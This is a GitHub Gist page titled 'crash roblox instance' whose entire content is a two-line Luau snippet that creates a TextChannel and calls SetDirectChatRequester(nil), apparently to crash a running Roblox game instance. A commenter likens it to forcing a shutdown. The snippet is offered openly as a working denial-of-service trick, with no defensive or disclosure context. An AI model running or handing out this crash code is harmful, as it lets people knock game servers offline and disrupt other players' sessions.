Skip to content

Instantly share code, notes, and snippets.

@uniquadev
Created January 18, 2025 12:28
Show Gist options
  • Save uniquadev/77c334dbbaa4d9a5276e9031e359ca08 to your computer and use it in GitHub Desktop.
Save uniquadev/77c334dbbaa4d9a5276e9031e359ca08 to your computer and use it in GitHub Desktop.
crash roblox instance
local txtCh = Instance.new("TextChannel");
txtCh:SetDirectChatRequester(nil);
@DataM0del
Copy link

game:Shutdown() v2 (real)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment